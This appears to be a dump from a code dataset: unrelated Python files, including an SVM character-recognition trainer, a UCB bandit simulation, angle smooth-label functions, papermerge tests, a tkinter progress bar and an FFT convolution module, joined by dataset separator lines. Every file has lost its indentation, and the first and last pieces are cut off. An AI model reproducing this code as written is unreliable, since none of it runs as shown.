docs.extend(d)
self.assertEqual(len(docs), 17)
# Copyright © 2016, Regents of the University of California
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# - Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# - Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# - Neither the name of the University of California nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
StarcoderdataPython
|
11318390
|
from __future__ import annotations
from mentormatch.api.applicant.applicant_abc import Applicant
from mentormatch.utils import ApplicantType
from typing import TYPE_CHECKING, Dict
if TYPE_CHECKING:
from mentormatch.api.sorter.sorter_abc import Sorter
class Mentor(Applicant):
applicant_type = ApplicantType.MENTOR
def __init__(self, applicant_dict: Dict, sorter: Sorter):
super().__init__(
applicant_dict=applicant_dict,
sorter=sorter,
)
self.max_pair_count = int(applicant_dict['max_mentee_count'])
|
StarcoderdataPython
|
8060585
|
<reponame>AmudhanManisekaran/AI-Cop
import os
import numpy as np
from sklearn.svm import SVC
from sklearn.model_selection import cross_val_score
from sklearn.externals import joblib
from skimage.io import imread
from skimage.filters import threshold_otsu
# letters = [
# '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
# 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T',
# 'U', 'V', 'W', 'X', 'Y', 'Z'
# ]
letters = [
'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T',
'U', 'V', 'W', 'X', 'Y', 'Z'
]
# numbers = [ 0, 1, 2, 5 ,6, 10, 17, 18 ,25, 26, 29, 30, 33, 37, 38 ,45, 49, 50, 57, 58, 65, 66, 68, 81, 153, 154,
# 155, 156, 157, 158, 161, 166, 168, 169, 170, 173, 174, 175, 176, 177, 178, 181, 182, 185, 186, 187, 189,
# 472, 489, 490, 491, 492, 546, 726, 737, 738, 773, 774, 946, 948, 954, 962, 966, 974, 977, 982, 986, 1010]
# letters = [
# '0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'A', 'B', 'C', 'D',
# 'E', 'F', 'G', 'H', 'J', 'K', 'L', 'M', 'N', 'P', 'Q', 'R', 'S', 'T',
# 'U', 'V', 'W', 'X', 'Y', 'Z'
# ]
# folders = [ "Sample001","Sample002","Sample003","Sample004","Sample005","Sample006",
# "Sample007","Sample008","Sample009","Sample010","Sample011","Sample012",
# "Sample013","Sample014","Sample015","Sample016","Sample017","Sample018",
# "Sample019","Sample020","Sample021","Sample022","Sample023","Sample024",
# "Sample025","Sample26","Sample27","Sample028","Sample029","Sample030",
# "Sample031","Sample032","Sample033","Sample034","Sample035","Sample036",]
# numbers = [ "001","002","003","004","005","006",
# "007","008","009","010","011","012",
# "013","014","015","016","017","018",
# "019","020","021","022","023","024",
# "025","026","027","028","029","030",
# "031","032","033","034","035","036",]
def read_training_data(training_directory):
image_data = []
target_data = []
for each_letter in letters:
# for each_number in numbers:
for each in range(1,78):
# image_path = os.path.join(training_directory, each_letter, each_letter + '_' + str(each) + '.jpg')
image_path = os.path.join(training_directory, each_letter , ' (' + str(each) + ').jpg')
# image_path = os.path.join(training_directory, 'set' + each_number, 'img' + each_number + ' (' + str(each) + ').jpg')
# read each image of each character
img_details = imread(image_path, as_grey=True)
# converts each character image to binary image
binary_image = img_details < threshold_otsu(img_details)
# binary_image = img_details < img_details
# the 2D array of each image is flattened because the machine learning
# classifier requires that each sample is a 1D array
# therefore the 20*20 image becomes 1*400
# in machine learning terms that's 400 features with each pixel
# representing a feature
flat_bin_image = binary_image.reshape(-1)
image_data.append(flat_bin_image)
target_data.append(each_letter)
# target_data.append(each_number)
return (np.array(image_data), np.array(target_data))
def cross_validation(model, num_of_fold, train_data, train_label):
# this uses the concept of cross validation to measure the accuracy
# of a model, the num_of_fold determines the type of validation
# e.g if num_of_fold is 4, then we are performing a 4-fold cross validation
# it will divide the dataset into 4 and use 1/4 of it for testing
# and the remaining 3/4 for the training
accuracy_result = cross_val_score(model, train_data, train_label,
cv=num_of_fold)
print("Cross Validation Result for ", str(num_of_fold), " -fold")
print(accuracy_result * 100)
current_dir = os.path.dirname(os.path.realpath(__file__))
# training_dataset_dir = os.path.join(current_dir, 'train')
training_dataset_dir = os.path.join(current_dir, 'train_new_78')
# training_dataset_dir = os.path.join(current_dir, 'fonts')
image_data, target_data = read_training_data(training_dataset_dir)
# the kernel can be 'linear', 'poly' or 'rbf'
# the probability was set to True so as to show
# how sure the model is of it's prediction
svc_model = SVC(kernel='linear', probability=True)
cross_validation(svc_model, 4, image_data, target_data)
# let's train the model with all the input data
svc_model.fit(image_data, target_data)
# we will use the joblib module to persist the model
# into files. This means that the next time we need to
# predict, we don't need to train the model again
save_directory = os.path.join(current_dir, 'models/svc/')
if not os.path.exists(save_directory):
os.makedirs(save_directory)
joblib.dump(svc_model, save_directory+'/svc.pkl')
|
StarcoderdataPython
|
12816628
|
<filename>src/UCB.py<gh_stars>0
import numpy as np
import matplotlib.pyplot as plt
class UCB:
def __init__(self, avg: np.ndarray):
self.true_means = avg # true means of the arms
self.num_arms = avg.size # num arms (k)
self.best_arm = int(np.argmax(self.true_means)) # True best arm
# sort = np.sort(self.true_means)[::-1]
# self.delta_min = sort[0] - sort[1]
# self.C = 1
self.time = 0
self.regret = []
self.emp_means = np.zeros_like(self.true_means) # empirical means of arms \hat{\mu_j}
self.num_pulls = np.zeros_like(self.true_means) # number of times that arm i has been pulled T_j
self.ucb_arr = 1e5 * np.ones_like(self.true_means) # Upper confidence bounds i.e. U_j
self.arm_ix = None
def restart(self):
# Reset counters
self.time = 0
self.regret = []
self.emp_means = np.zeros_like(self.true_means)
self.num_pulls = np.zeros_like(self.true_means)
self.ucb_arr = 1e5 * np.ones_like(self.true_means)
self.arm_ix = None
def get_best_arm(self):
# For each time index, find the best arm according to UCB
return np.argmax(self.ucb_arr)
def update_ucb(self):
f = 1 + self.time * (np.log(self.time + 1) ** 2)
for j in range(self.num_arms):
# So that T[j-1] is not 0 ~ div by zero error else
nj = 1 if self.num_pulls[j] == 0 else self.num_pulls[j]
self.ucb_arr[j] = self.emp_means[j] + np.sqrt((2 * np.log(f)) / nj)
def update_stats(self, rew_vec):
# genie plays best arm
genie_rew = rew_vec[self.best_arm]
player_rew = rew_vec[self.arm_ix]
self.regret.append((genie_rew - player_rew))
ni = self.num_pulls[self.arm_ix]
self.emp_means[self.arm_ix] = self.emp_means[self.arm_ix] * (ni / (ni + 1)) + player_rew / (ni + 1)
self.num_pulls[self.arm_ix] += 1
self.time += 1
def get_reward(self):
return self.true_means + np.random.normal(0, 1, np.shape(self.true_means))
def iterate(self):
# if self.time < self.num_arms:
# # So that T[j-1] is not 0 ~ div by zero error else
# self.arm_ix = self.time
# else:
self.update_ucb()
self.arm_ix = self.get_best_arm()
rew_vec = self.get_reward()
self.update_stats(rew_vec=rew_vec)
def run(avg, iterations, num_repeat):
regret = np.zeros((num_repeat, iterations))
ucb = UCB(avg=avg)
for j in range(num_repeat):
for t in range(iterations):
ucb.iterate()
# calculate cumulative regret
regret[j, :] = np.cumsum(np.asarray(ucb.regret))
ucb.restart()
return regret
if __name__ == '__main__':
mu = np.asarray([0.8, 0.96, 0.7, 0.5, 0.4, 0.3])
num_iter, num_inst = int(5e4), 30
reg = run(avg=mu,
iterations=num_iter,
num_repeat=num_inst)
mean_runs = np.mean(reg, axis=0)
std_runs = np.std(reg, axis=0)
UB = mean_runs + 1 * std_runs
LB = mean_runs - 1 * std_runs
x = np.arange(len(mean_runs))
plt.plot(x, mean_runs, color='b')
# plt.fill_between(x, LB, UB, alpha=0.3, linewidth=0.5, color='b')
plt.xlabel('Time (Log Scale)', fontsize=10)
plt.ylabel('Cumulative Regret with UCB', fontsize=10)
plt.xscale('log')
plt.grid(True, which='both', linestyle='--')
plt.show()
|
StarcoderdataPython
|
1959680
|
<gh_stars>1-10
# -*- coding:utf-8 -*-
# Author: <NAME> <<EMAIL>>, <<EMAIL>>
# License: Apache-2.0 license
# Copyright (c) SJTU. ALL rights reserved.
from __future__ import absolute_import, division, print_function
import numpy as np
import math
def gaussian_label(label, num_class, u=0, sig=4.0):
"""
Get gaussian label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param u: mean
:param sig: window radius
:return: gaussian label
"""
x = np.array(range(math.floor(-num_class/2), math.ceil(num_class/2), 1))
if num_class % 2 != 0:
x = x[:-1]
y_sig = np.exp(-(x - u) ** 2 / (2 * sig ** 2))
return np.concatenate([y_sig[math.ceil(num_class/2)-label:],
y_sig[:math.ceil(num_class/2)-label]], axis=0)
def rectangular_label(label, num_class, radius=4):
"""
Get rectangular label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param radius: window radius
:return: rectangular label
"""
x = np.zeros([num_class])
x[:radius+1] = 1
x[-radius:] = 1
y_sig = np.concatenate([x[-label:], x[:-label]], axis=0)
return y_sig
def pulse_label(label, num_class):
"""
Get pulse label
:param label: angle_label/omega
:param num_class: angle_range/omega
:return: pulse label
"""
x = np.zeros([num_class])
x[label] = 1
return x
def triangle_label(label, num_class, radius=4):
"""
Get triangle label
:param label: angle_label/omega
:param num_class: angle_range/omega
:param radius: window radius
:return: triangle label
"""
y_sig = np.zeros([num_class])
x = np.array(range(radius+1))
y = -1/(radius+1) * x + 1
y_sig[:radius+1] = y
y_sig[-radius:] = y[-1:0:-1]
return np.concatenate([y_sig[-label:], y_sig[:-label]], axis=0)
def get_all_smooth_label(num_label, label_type=0, radius=4):
all_smooth_label = []
if label_type == 0:
for i in range(num_label):
all_smooth_label.append(gaussian_label(i, num_label, sig=radius))
elif label_type == 1:
for i in range(num_label):
all_smooth_label.append(rectangular_label(i, num_label, radius=radius))
elif label_type == 2:
for i in range(num_label):
all_smooth_label.append(pulse_label(i, num_label))
elif label_type == 3:
for i in range(num_label):
all_smooth_label.append(triangle_label(i, num_label, radius=radius))
else:
raise Exception('Only support gaussian, rectangular, triangle and pulse label')
return np.array(all_smooth_label)
def angle_smooth_label(angle_label, angle_range=90, label_type=0, radius=4, omega=1):
"""
:param angle_label: angle label, range in [-90,0) or [-180, 0)
:param angle_range: 90 or 180
:param label_type: 0: gaussian label, 1: rectangular label, 2: pulse label, 3: triangle label
:param radius: window radius
:param omega: angle discretization granularity
:return:
**Circular Smooth Label:**
Proposed by `"<NAME> al. Arbitrary-Oriented Object Detection with Circular Smooth Label. ECCV 2020."
<https://link.springer.com/chapter/10.1007/978-3-030-58598-3_40>`_
.. image:: ../../images/csl.jpg
"""
assert angle_range % omega == 0, 'wrong omega'
angle_range /= omega
angle_label /= omega
angle_label = np.array(-np.round(angle_label), np.int32)
all_smooth_label = get_all_smooth_label(int(angle_range), label_type, radius)
inx = angle_label == angle_range
angle_label[inx] = angle_range - 1
smooth_label = all_smooth_label[angle_label]
return np.array(smooth_label, np.float32)
if __name__ == '__main__':
import matplotlib.pyplot as plt
# angle_label = np.array([-89.9, -45.2, -0.3, -1.9])
# smooth_label = angle_smooth_label(angle_label)
# y_sig = triangle_label(30, 180, radius=8)
y_sig = gaussian_label(180, 180, sig=6)
# y_sig = pulse_label(40, 180)
# y_sig = triangle_label(3, 180, radius=1)
x = np.array(range(0, 180, 1))
plt.plot(x, y_sig, "r-", linewidth=2)
plt.grid(True)
plt.show()
print(y_sig)
print(y_sig.shape)
|
StarcoderdataPython
|
11358513
|
<filename>papermerge/test/test_tags.py
from pathlib import Path
from django.test import TestCase
from papermerge.core.models import (
Document,
Folder,
Tag
)
from papermerge.test.utils import create_root_user
# points to papermerge.testing folder
BASE_DIR = Path(__file__).parent
class TestDocument(TestCase):
def setUp(self):
self.user = create_root_user()
def test_basic_document_tagging(self):
doc = Document.create_document(
title="document_c",
file_name="document_c.pdf",
size='1212',
lang='DEU',
user=self.user,
page_count=5,
)
doc.save()
# associate "invoice" and "paid" tags
# boths tags belong to self.user
doc.tags.add(
"invoice",
"paid",
tag_kwargs={"user": self.user}
)
# If you’re filtering on multiple tags, it’s very common to get
# duplicate results,
# because of the way relational databases work. Often
# you’ll want to make use of the distinct() method on QuerySets.
found_docs = Document.objects.filter(
tags__name__in=["paid", "invoice"]
).distinct()
self.assertEquals(
found_docs.count(),
1
)
self.assertEquals(
found_docs.first().title,
"document_c"
)
def test_restore_multiple_tags(self):
"""
Given a list of dictionaries with tag
attributes - add those tags to the document
(eventually create core.models.Tag instances).
Keep in mind that tag instances need to belong to same user as the
document owner.
This scenario is used in restore script (restore from backup).
"""
tag_attributes = [
{
"bg_color": "#ff1f1f",
"fg_color": "#ffffff",
"name": "important",
"description": "",
"pinned": True
},
{
"bg_color": "#c41fff",
"fg_color": "#FFFFFF",
"name": "receipts",
"description": None,
"pinned": False
}
]
doc = Document.create_document(
title="document_c",
file_name="document_c.pdf",
size='1212',
lang='DEU',
user=self.user,
page_count=5,
)
doc.save()
for attrs in tag_attributes:
attrs['user'] = self.user
tag = Tag.objects.create(**attrs)
doc.tags.add(tag)
doc.refresh_from_db()
self.assertEquals(
set([tag.name for tag in doc.tags.all()]),
{"receipts", "important"}
)
def test_basic_folder_tagging(self):
folder = Folder.objects.create(
title="Markus",
user=self.user
)
folder.tags.add(
"invoices",
tag_kwargs={"user": self.user}
)
found_folders = Folder.objects.filter(
tags__name__in=["invoices"]
)
self.assertEquals(
found_folders.count(),
1
)
self.assertEquals(
found_folders.first().title,
"Markus"
)
|
StarcoderdataPython
|
5040017
|
<filename>2_Python Advanced/7_Gui/21_progressBar.py
# -*- coding: utf-8 -*-
"""
Created on Thu May 31 23:57:18 2018
@author: SilverDoe
"""
from tkinter import *
from tkinter.ttk import Progressbar
from tkinter import ttk
window = Tk()
window.title("Welcome to LikeGeeks app")
window.geometry('350x200')
style = ttk.Style()
style.theme_use('default')
style.configure("black.Horizontal.TProgressbar", background='black')
bar = Progressbar(window, length=200, style='black.Horizontal.TProgressbar')
bar['value'] = 70
bar.grid(column=0, row=0)
window.mainloop()
|
StarcoderdataPython
|
8037081
|
from .dicts import JSONDecodeError
from .dicts import JsonDict
from .dicts import ReadOnlyJsonDict
from .exceptions import DataIntegrityError
from .exceptions import KeyDoesExistError
from .exceptions import KeyDoesNotExistError
from .exceptions import PeerDoesExistError
from .exceptions import PeerDoesNotExistError
from .exceptions import SettingDoesExistError
from .exceptions import SettingDoesNotExistError
from .exceptions import SiteDoesExistError
from .exceptions import SiteDoesNotExistError
from .exceptions import WireguardNotFoundError
from .list import BasicList
from .result import Message
from .result import MessageContent
from .result import MESSAGE_LEVEL
from .result import Result
from .result import ResultList
from .result import DataIntegrityMessage
from .result import DataIntegrityResult
from .peers import Keys
from .peers import PeerItems
from .peers import Peers
from .peers import RedirectAllTraffic
from .settings import Settings
from .sites import SiteItems
from .sites import Sites
from .tables import CONNECTION_TABLE_MESSAGE_TYPE
from .tables import ConnectionTable
from .tables import ConnectionTableMessage
from .tables import ConnectionTableMessageContent
__all__ = [
"MESSAGE_LEVEL",
"BasicList",
"CONNECTION_TABLE_MESSAGE_TYPE",
"ConnectionTable",
"ConnectionTableMessage",
"ConnectionTableMessageContent",
"DataIntegrityError",
"DataIntegrityMessage",
"DataIntegrityResult",
"JSONDecodeError",
"JsonDict",
"Keys",
"KeyDoesExistError",
"KeyDoesNotExistError",
"Message",
"MessageContent",
"PeerItems",
"PeerDoesExistError",
"PeerDoesNotExistError",
"Peers",
"ReadOnlyJsonDict",
"RedirectAllTraffic",
"Result",
"ResultList",
"SettingDoesExistError",
"SettingDoesNotExistError",
"Settings",
"SiteItems",
"SiteDoesExistError",
"SiteDoesNotExistError",
"Sites",
"WireguardNotFoundError",
]
|
StarcoderdataPython
|
6597120
|
#it includes part of the code of the image_registration repository
"""Copyright (c) 2012 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy of
this software and associated documentation files (the "Software"), to deal in
the Software without restriction, including without limitation the rights to
use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
of the Software, and to permit persons to whom the Software is furnished to do
so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import numpy as np
#from convolve_nd import convolvend as convolve
import numpy as np
import warnings
import itertools
from astropy.tests.helper import pytest
try:
import fftw3
has_fftw = True
def fftwn(array, nthreads=1):
array = array.astype('complex').copy()
outarray = array.copy()
fft_forward = fftw3.Plan(array, outarray, direction='forward',
flags=['estimate'], nthreads=nthreads)
fft_forward.execute()
return outarray
def ifftwn(array, nthreads=1):
array = array.astype('complex').copy()
outarray = array.copy()
fft_backward = fftw3.Plan(array, outarray, direction='backward',
flags=['estimate'], nthreads=nthreads)
fft_backward.execute()
return outarray / np.size(array)
except ImportError:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
has_fftw = False
# I performed some fft speed tests and found that scipy is slower than numpy
# http://code.google.com/p/agpy/source/browse/trunk/tests/test_ffts.py However,
# the speed varied on machines - YMMV. If someone finds that scipy's fft is
# faster, we should add that as an option here... not sure how exactly
def get_ffts(nthreads=1, use_numpy_fft=not has_fftw):
"""
Returns fftn,ifftn using either numpy's fft or fftw
"""
if has_fftw and not use_numpy_fft:
def fftn(*args, **kwargs):
return fftwn(*args, nthreads=nthreads, **kwargs)
def ifftn(*args, **kwargs):
return ifftwn(*args, nthreads=nthreads, **kwargs)
elif use_numpy_fft:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
else:
# yes, this is redundant, but I feel like there could be a third option...
fftn = np.fft.fftn
ifftn = np.fft.ifftn
return fftn,ifftn
#def convolvend(array, kernel, boundary='fill', fill_value=0,
def convolve(array, kernel, boundary='fill', fill_value=0,
crop=True, return_fft=False, fftshift=True, fft_pad=True,
psf_pad=False, interpolate_nan=False, quiet=False,
ignore_edge_zeros=False, min_wt=0.0, normalize_kernel=False,
use_numpy_fft=not has_fftw, nthreads=1):
"""
Convolve an ndarray with an nd-kernel. Returns a convolved image with shape =
array.shape. Assumes image & kernel are centered.
Parameters
----------
array: `numpy.ndarray`
Array to be convolved with *kernel*
kernel: `numpy.ndarray`
Will be normalized if *normalize_kernel* is set. Assumed to be
centered (i.e., shifts may result if your kernel is asymmetric)
Options
-------
boundary: str, optional
A flag indicating how to handle boundaries:
* 'fill' : set values outside the array boundary to fill_value
(default)
* 'wrap' : periodic boundary
interpolate_nan: bool
attempts to re-weight assuming NAN values are meant to be ignored, not
treated as zero. If this is off, all NaN values will be treated as
zero.
ignore_edge_zeros: bool
Ignore the zero-pad-created zeros. This will effectively decrease
the kernel area on the edges but will not re-normalize the kernel.
This parameter may result in 'edge-brightening' effects if you're using
a normalized kernel
min_wt: float
If ignoring NANs/zeros, force all grid points with a weight less than
this value to NAN (the weight of a grid point with *no* ignored
neighbors is 1.0).
If `min_wt` == 0.0, then all zero-weight points will be set to zero
instead of NAN (which they would be otherwise, because 1/0 = nan).
See the examples below
normalize_kernel: function or boolean
if specified, function to divide kernel by to normalize it. e.g.,
normalize_kernel=np.sum means that kernel will be modified to be:
kernel = kernel / np.sum(kernel). If True, defaults to
normalize_kernel = np.sum
Advanced options
----------------
fft_pad: bool
Default on. Zero-pad image to the nearest 2^n
psf_pad: bool
Default off. Zero-pad image to be at least the sum of the image sizes
(in order to avoid edge-wrapping when smoothing)
crop: bool
Default on. Return an image of the size of the largest input image.
If the images are asymmetric in opposite directions, will return the
largest image in both directions.
For example, if an input image has shape [100,3] but a kernel with shape
[6,6] is used, the output will be [100,6].
return_fft: bool
Return the fft(image)*fft(kernel) instead of the convolution (which is
ifft(fft(image)*fft(kernel))). Useful for making PSDs.
fftshift: bool
If return_fft on, will shift & crop image to appropriate dimensions
nthreads: int
if fftw3 is installed, can specify the number of threads to allow FFTs
to use. Probably only helpful for large arrays
use_numpy_fft: bool
Force the code to use the numpy FFTs instead of FFTW even if FFTW is
installed
Returns
-------
default: `array` convolved with `kernel`
if return_fft: fft(`array`) * fft(`kernel`)
* if fftshift: Determines whether the fft will be shifted before
returning
if not(`crop`) : Returns the image, but with the fft-padded size
instead of the input size
Examples
--------
>>> convolvend([1,0,3],[1,1,1])
array([ 1., 4., 3.])
>>> convolvend([1,np.nan,3],[1,1,1],quiet=True)
array([ 1., 4., 3.])
>>> convolvend([1,0,3],[0,1,0])
array([ 1., 0., 3.])
>>> convolvend([1,2,3],[1])
array([ 1., 2., 3.])
>>> convolvend([1,np.nan,3],[0,1,0], interpolate_nan=True)
array([ 1., 0., 3.])
>>> convolvend([1,np.nan,3],[0,1,0], interpolate_nan=True, min_wt=1e-8)
array([ 1., nan, 3.])
>>> convolvend([1,np.nan,3],[1,1,1], interpolate_nan=True)
array([ 1., 4., 3.])
>>> convolvend([1,np.nan,3],[1,1,1], interpolate_nan=True, normalize_kernel=True, ignore_edge_zeros=True)
array([ 1., 2., 3.])
"""
# Checking copied from convolve.py - however, since FFTs have real &
# complex components, we change the types. Only the real part will be
# returned!
# Check that the arguments are lists or Numpy arrays
array = np.asarray(array, dtype=np.complex)
kernel = np.asarray(kernel, dtype=np.complex)
# Check that the number of dimensions is compatible
#in principle i do not need that because i check it beforehand
if array.ndim != kernel.ndim:
raise Exception('array and kernel have differing number of'
'dimensions')
# store the dtype for conversion back later
array_dtype = array.dtype
# turn the arrays into 'complex' arrays
if array.dtype.kind != 'c':
array = array.astype(np.complex)
if kernel.dtype.kind != 'c':
kernel = kernel.astype(np.complex)
# mask catching - masks must be turned into NaNs for use later
if np.ma.is_masked(array):
mask = array.mask
array = np.array(array)
array[mask] = np.nan
if np.ma.is_masked(kernel):
mask = kernel.mask
kernel = np.array(kernel)
kernel[mask] = np.nan
# replace fftn if has_fftw so that nthreads can be passed
global fftn, ifftn
if has_fftw and not use_numpy_fft:
def fftn(*args, **kwargs):
return fftwn(*args, nthreads=nthreads, **kwargs)
def ifftn(*args, **kwargs):
return ifftwn(*args, nthreads=nthreads, **kwargs)
elif use_numpy_fft:
fftn = np.fft.fftn
ifftn = np.fft.ifftn
# NAN catching
nanmaskarray = (array != array)
array[nanmaskarray] = 0
nanmaskkernel = (kernel != kernel)
kernel[nanmaskkernel] = 0
if ((nanmaskarray.sum() > 0 or nanmaskkernel.sum() > 0) and not interpolate_nan
and not quiet):
warnings.warn("NOT ignoring nan values even though they are present" +
" (they are treated as 0)")
if normalize_kernel is True:
kernel = kernel / kernel.sum()
kernel_is_normalized = True
elif normalize_kernel:
# try this. If a function is not passed, the code will just crash... I
# think type checking would be better but PEPs say otherwise...
kernel = kernel / normalize_kernel(kernel)
kernel_is_normalized = True
else:
if np.abs(kernel.sum() - 1) < 1e-8:
kernel_is_normalized = True
else:
kernel_is_normalized = False
if boundary is None:
WARNING = ("The convolvend version of boundary=None is equivalent" +
" to the convolve boundary='fill'. There is no FFT " +
" equivalent to convolve's zero-if-kernel-leaves-boundary" )
warnings.warn(WARNING)
psf_pad = True
elif boundary == 'fill':
# create a boundary region at least as large as the kernel
psf_pad = True
elif boundary == 'wrap':
psf_pad = False
fft_pad = False
fill_value = 0 # force zero; it should not be used
elif boundary == 'extend':
raise NotImplementedError("The 'extend' option is not implemented " +
"for fft-based convolution")
arrayshape = array.shape
kernshape = kernel.shape
ndim = len(array.shape)
if ndim != len(kernshape):
raise ValueError("Image and kernel must " +
"have same number of dimensions")
# find ideal size (power of 2) for fft.
# Can add shapes because they are tuples
if fft_pad:
if psf_pad:
# add the dimensions and then take the max (bigger)
fsize = 2**np.ceil(np.log2(
np.max(np.array(arrayshape) + np.array(kernshape))))
else:
# add the shape lists (max of a list of length 4) (smaller)
# also makes the shapes square
fsize = 2**np.ceil(np.log2(np.max(arrayshape+kernshape)))
newshape = np.array([fsize for ii in range(ndim)])
else:
if psf_pad:
# just add the biggest dimensions
newshape = np.array(arrayshape)+np.array(kernshape)
else:
newshape = np.array([np.max([imsh, kernsh])
for imsh, kernsh in zip(arrayshape, kernshape)])
# separate each dimension by the padding size... this is to determine the
# appropriate slice size to get back to the input dimensions
arrayslices = []
kernslices = []
for ii, (newdimsize, arraydimsize, kerndimsize) in enumerate(zip(newshape, arrayshape, kernshape)):
center = newdimsize - (newdimsize+1)//2
arrayslices += [slice(center - arraydimsize//2,
center + (arraydimsize+1)//2)]
kernslices += [slice(center - kerndimsize//2,
center + (kerndimsize+1)//2)]
bigarray = np.ones(newshape, dtype=np.complex128) * fill_value
bigkernel = np.zeros(newshape, dtype=np.complex128)
bigarray[arrayslices] = array
bigkernel[kernslices] = kernel
arrayfft = fftn(bigarray)
# need to shift the kernel so that, e.g., [0,0,1,0] -> [1,0,0,0] = unity
kernfft = fftn(np.fft.ifftshift(bigkernel))
fftmult = arrayfft*kernfft
if (interpolate_nan or ignore_edge_zeros) and kernel_is_normalized:
if ignore_edge_zeros:
bigimwt = np.zeros(newshape, dtype=np.complex128)
else:
bigimwt = np.ones(newshape, dtype=np.complex128)
bigimwt[arrayslices] = 1.0-nanmaskarray*interpolate_nan
wtfft = fftn(bigimwt)
# I think this one HAS to be normalized (i.e., the weights can't be
# computed with a non-normalized kernel)
wtfftmult = wtfft*kernfft/kernel.sum()
wtsm = ifftn(wtfftmult)
# need to re-zero weights outside of the image (if it is padded, we
# still don't weight those regions)
bigimwt[arrayslices] = wtsm.real[arrayslices]
# curiously, at the floating-point limit, can get slightly negative numbers
# they break the min_wt=0 "flag" and must therefore be removed
bigimwt[bigimwt<0] = 0
else:
bigimwt = 1
if np.isnan(fftmult).any():
# this check should be unnecessary; call it an insanity check
raise ValueError("Encountered NaNs in convolve. This is disallowed.")
# restore nans in original image (they were modified inplace earlier)
# We don't have to worry about masked arrays - if input was masked, it was
# copied
array[nanmaskarray] = np.nan
kernel[nanmaskkernel] = np.nan
if return_fft:
if fftshift: # default on
if crop:
return np.fft.fftshift(fftmult)[arrayslices]
else:
return np.fft.fftshift(fftmult)
else:
return fftmult
if interpolate_nan or ignore_edge_zeros:
rifft = (ifftn(fftmult)) / bigimwt
if not np.isscalar(bigimwt):
rifft[bigimwt < min_wt] = np.nan
if min_wt == 0.0:
rifft[bigimwt == 0.0] = 0.0
else:
rifft = (ifftn(fftmult))
if crop:
result = rifft[arrayslices].real
return result
else:
return rifft.real
def correlate2d(im1,im2, boundary='wrap', **kwargs):
"""
Cross-correlation of two images of arbitrary size. Returns an image
cropped to the largest of each dimension of the input images
Options
-------
return_fft - if true, return fft(im1)*fft(im2[::-1,::-1]), which is the power
spectral density
fftshift - if true, return the shifted psd so that the DC component is in
the center of the image
pad - Default on. Zero-pad image to the nearest 2^n
crop - Default on. Return an image of the size of the largest input image.
If the images are asymmetric in opposite directions, will return the largest
image in both directions.
boundary: str, optional
A flag indicating how to handle boundaries:
* 'fill' : set values outside the array boundary to fill_value
(default)
* 'wrap' : periodic boundary
WARNING: Normalization may be arbitrary if you use the PSD
"""
return convolve(np.conjugate(im1), im2[::-1, ::-1], normalize_kernel=False,
boundary=boundary, ignore_edge_zeros=False, **kwargs)
|
StarcoderdataPython
|
1682101
|
from ydk.services import CRUDService
from ydk.providers import NetconfServiceProvider
from ydk.models.cisco_ios_xe import Cisco_IOS_XE_interfaces_oper as xe_interface
import device
ios_xe = device.xe_sandbox()
# EXERCISE : Construct an instance of the NetconfServiceProvider class.
# Use the YDK documentation on NETCONF Service Provider to understand which parameters you need to pass.
# Parameters are stored in the `device` class (which is imported line 4).
provider = NetconfServiceProvider(EXERCISE)
# create CRUD service
crud = CRUDService()
# EXERCISE : Set the right filter, using Advanced Netconf Explorer, using the right attribute(s) of the imported
# `Cisco_IOS_XE_interfaces_oper` module
interfaces_filter = EXERCISE
# EXERCISE : Use the `CRUDService API` to get (READ) the operational state of the interfaces of the device.
# Store the object in a new variable `interfaces`
interfaces = EXERCISE
# EXERCISE : now that you have an object, containing the interfaces operational state, get each interface name, and each interface IP.
|
StarcoderdataPython
|
8006871
|
from six import wraps
class Response(object):
"""
Transloadit http Response Object
:Attributes:
